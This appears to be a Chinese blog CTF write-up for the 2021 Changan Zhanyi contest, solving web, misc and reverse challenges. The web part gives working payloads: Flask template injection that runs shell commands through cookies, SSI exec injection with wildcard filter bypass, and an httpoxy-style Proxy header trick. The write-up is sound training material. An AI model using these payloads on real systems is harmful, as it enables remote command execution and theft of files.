[CTF]2021长安战疫 WP

最新推荐文章于 2024-08-05 23:10:28 发布
最新推荐文章于 2024-08-05 23:10:28 发布
阅读量2.7k 收藏 2
点赞数
分类专栏: CTF 文章标签: flask python 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sapphire037/article/details/122393368
版权

前言

这次比赛还是挺有意义的。

WEB

flask

在这里插入图片描述
url结尾要是.js?
直接放payload
在这里插入图片描述

GET /admin?name={{(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4).eval(request.cookies.x5)}}&a=.js? 
Cookie: x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=__import__('os').popen('cat /flag').read()

Baby_upload

过滤了很多,但是没有过滤shtml,考虑ssi注入,先试一下这样,发现ls应该是被过滤了
在这里插入图片描述
但是还可以用dir /来看目录下文件,发现有

app home root start.sh bin lib run sys boot lib64 run.sh tmp create_mysql_admin_user.sh media sbin usr dev mnt srv var etc opt start-apache2.sh fffffflllll11111aaaaa4444ggggg proc start-mysqld.sh

很明显的有flag,但是cat tac nl等等读文件的命令都没了,测了一下还有awk,cut,strings.因为fl是被过滤了的,可以用?来匹配,所以可以构造如下payload

cut -b 1-100 ffffffllll?11111aaaaa4444ggggg

还可以

<!--#exec cmd="/???/??? /ffffff?llll11111aaaaa4444ggggg" -->

flag配送中心

一个httpproxy的cve,当我们在请求报文的头加上
Proxy:http://ip:port由于php版本的原因,会自动在Proxy前加上HTTP_,导致漏洞产生,所以只需要加个头,然后在服务器上开启监听即可得到flag
在这里插入图片描述

Misc

八卦迷宫

跟着走就行
在这里插入图片描述

ezsteg

爆破得到密码220101
题目说了steg,py的隐写,用python stegosaurus.py -x steg.pyc
在这里插入图片描述
然后emoji-aes输入密钥即可获得flag

朴实无华的取证

先正常的取证操作
然后
在这里插入图片描述
得到图片
在这里插入图片描述
爆破flag.zip得到密码20211209
然后得到加密脚本

//幼儿园水平的加密(部分)
void Encrypt(string& str)
{
	for(int i = 0; i < str.length(); i++)
	{
		if(str[i] >='a'&& str[i]<='w')
			str[i]+=3;
		else if(str[i]=='x')
			str[i]='a';
		else if(str[i]=='y')
			str[i]='b';
		else if(str[i]=='z')
			str[i]='c';	
		else if(str[i]=='_')
			str[i]='|';
		str[i] -= 32;
	}
}

解密

s = b"fdcb[8ldq?zloo?fhuwdlqobvxffhhg?lq?iljkwlqj?wkh?hslghplf]"
s = s.upper()
for c in s:
    c += 32
    print(chr(c), end='')

然后凯撒,然后猜出flag

ezencrypt

下载一个流量包,导出对象,一串奇怪的数据,base64之后是zip数据流,然后导出zip
用D盾扫描
应该就是个混淆加密,找网站在线解得到

<?php
namespace app\controller;

use app\BaseController;

class Index extends BaseController
{
    public function index()
    {
        if(!empty($_GET['pop'])){
            unserialize(base64_decode($_GET['pop']));
        }
        return "Welcom To CAZT! Xi'an Come On!";
    }

    public function C4zyC0m3On()
    {
        return 'cazy{PHP_ji4m1_1s_s00000_3aSyyyyyyyyyyy}';
    }
}
?>

西安加油

流量包提取数据secret.txt,base64解密后存为文件,压缩包,要拼图。自动拼图即可
在这里插入图片描述

逆向

combat_slogan

jd-gui反编译发现
在这里插入图片描述
rot13解得We_w11l_f1ght_t0_end_t0_end_cazy

cute_doge

shift+f12得到ZmxhZ3tDaDFuYV95eWRzX2Nhenl9…
flag{Ch1na_yyds_cazy}

Sapphire037
关注
专栏目录
[SWPUCTF 2021 新生赛]sql - 联合注入
oZuoShen123的博客
10-07 673
Your Login name:id,flag —— 这里复习了一下任意匹配字符,一开始都以为不用加%,差点忘记了。Your Login name:LTLT_flag,users —— 得到LTLT_flag。1、fuzz看哪些关键字被过滤:空格、substr、=被过滤。这题相比于参考文章的题目多了waf过滤。首先,仍然是网站标题提示参数是wllm。
[CTF]HGAME2021 WP
Sapphire037的博客
02-18 1542
MISC 群青(其实是幽灵东京) wav,audicaty看频谱图 文件属性让我们试试silenteye,解密得到 访问,下载后文件名提示了SSTV,可以扫出 hgame{1_c4n_5ee_the_wav} WEB Fujiwara Tofu Shop 首先给了 猜到是要加referer头,所以加个头referer: qiumingshan.net 然后 那么我们知道 User Agent中文名为用户代理,简称 UA,它是一个特殊字符串头,使得服务器能够识别客户使用的操作系统及版本、CPU 类型、
长安战疫”网络安全卫士守护赛部分wp
m0_56194555的博客
01-08 2926
长安战疫”网络安全卫士守护赛部分wp 然后就是朴实无华的取证那个题 不知道是大小写的原因还是啥交不上,无字天书卡到最后那个长得好像摩斯密码的地方,收获满满,继续努力。
长安“战役“网络安全卫士守护赛
Keepb1ue的博客
01-14 2285
文章目录Webshiro?RCE_No_ParaFlag配送中心Misc迷宫朴实无华的取证无字天书stegbinaryCryptono_cry_no_bbno_cry_no_canno_math_no_cryReversecombat_slogancute_doge Web shiro? 很明显不是一般的shiro,很多命令都不能用,又是Sprintboot框架,那可以尝试log4j RCE 发现存在WAF检测,bypass测试绕过:${${::-j}ndi:rmi://r5qm53.dnslog.cn/
[CTF-Misc攻防世界]steg没有py
最新发布
2302_76688540的博客
08-05 164
a是x的平方,b是x-2的平方,25和9,还有一对是16和4,但是只能是奇数。我们根据题目意思得到,使用kali中i的stegpy工具,来进行解密图片。第一行是放射密码,后面几行是a,b的值。kali中并不自带该命令,我们下载后发现是一张图片。得到25和9,我们去。
[XCTF]steg没有py(难度1)
Mr_Fmnwon的博客
10-30 4192
stegpy隐写工具、仿射Affine密码
XCTF-MISC-Steg 没有py
weixin_45723896的博客
07-02 833
转换思路,stegpy是一种图片隐写,通过执行stegpy XXX XXX.png 就可以将内容隐写到图片中。仿射密码解密之前的位置是大写的,解密之后对应位置的字符也应该大写,所以最终的flag是:flag{4f71ne_C1ph3r_15_FFFFunny!根据提示猜测是仿射密码(Affine)仿射密码的加密需要a, b ,提示的也有a, b,a是x的平方,b是(x-2)的平方,推测a=25, b = 9。把图片放进kali里边,能够正常的打开,说明图片的宽和高没有被恶意的更改。
[青少年CTF]-MISC WP(一)
qq_45524026的博客
03-14 2142
[青少年CTF]-MISC WP(一)
领航杯 CTF 2021 决赛 真题 7z
12-07
领航杯 CTF 2021 决赛
绿城杯 CTF 2021 真题 (1).rar
12-07
【绿城杯 CTF 2021 真题】是一个网络安全竞赛的实战题目集,主要涉及计算机安全领域的各种挑战,旨在检验参赛者在逆向工程、密码学、Web安全、移动安全、取证分析等多个方面的技能。CTF(Capture The Flag)比赛是一...
[SWPUCTF 2021 新生赛]gift_F12
qq_35881369的博客
05-25 512
[SWPUCTF 2021 新生赛]gift_F12 黑客入门
steg:Steg是一个简单的python库,用于使用最低有效位(LSB)隐写术从无损压缩的图像中隐藏和提取消息
05-05
g Steg是一个简单的python库,用于使用最低有效位(LSB)隐写术从无损压缩的图像中隐藏和提取消息。 当前支持的图像格式包括PNG,TIFF,BMP和ICO。 Steg还包括用于快速隐藏和提取的命令行工具。 安装 $ pip install steg 代码中的用法 # Import library from steg import steg_img # Hiding # Select your payload and carrier files s = steg_img.IMG(payload_path=<payload>, image_path=<carrier>) # Create a new image containing your payload s.hide() # Extracting # Select the carrier image s_p
steghide隐写术必备工具
01-18
steghide隐写术必备工具 steghide隐写术必备工具 steghide隐写术必备工具 steghide隐写术必备工具 steghide隐写术必备工具
攻防世界 steg没有py
shixinruaisy的博客
03-02 633
这个文件打开后就是加密内容,encrypt 是加密,根据加密内容,我们得知这是个仿射密码,因为给出了a和b,还给出了a和b的信息为(1~25】,根据里面的内容,计算出a,b的值可能是25,9或者16 ,4。我们还要注意,解密前大写的位置,解密后就变成小写了,但是我们还是要把她变成大写。然后我们把图片拉到stegpy的工具包里面。密码就是文件名,在这里我用红色框框了起来。然后我们使用stegpy去解密。我们就又能得到一个txt文件。安装好后,我们进入到里面。
【攻防世界misc--steg没有py】
ncnfjdjjd的博客
01-23 890
stegpy 工具
江苏工匠杯0解 攻防世界0解 misc steg没有py
weixin_47099592的博客
09-25 2781
Do_you_like_misc刚好16位。根据题目steg可知是stegpy解密。师傅帮助 a = 25 , b = 9。原比赛提示是16位的密钥 所以。但是大多数人可能卡在了密码。根据代码提示可知是放射密码。首先拿到题目是一个图片。解开后发现一个txt。
长安战疫”网络安全卫士守护赛部分writeup
weixin_52829570的博客
01-08 1815
解题过程 题目一 八卦迷宫 用画图工具手工连接,然后将路上的图表和字相对应 按顺序打出,然后根据题目要求换成全拼,加上图片里的前缀cazy{}提交 flag为: cazy{zhanchangyangchangzhanyanghechangshanshananzhanyiyizhanyianyichanganyang} 题目二 西安加油 用wireshark打开发现一个很大而且带有很多base64编码的流量 追踪http流,复制去解base64,得到一个zip 解压得
[青少年CTF]Misc—Easy by 周末
个人文章分享
12-02 4306
青少年CTF训练平台Misc—Easy部分的WP
Securinets CTF 2021:漏洞利用解析与技巧
"Securinets CTF Quals 2021的比赛解题报告,主要涉及一个名为'kill shot'的Pwn类题目,该题目是一个受到Seccomp保护的二进制程序,需要利用格式字符串漏洞泄露libc和栈地址,通过Write What Where技术将fastbin链接...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值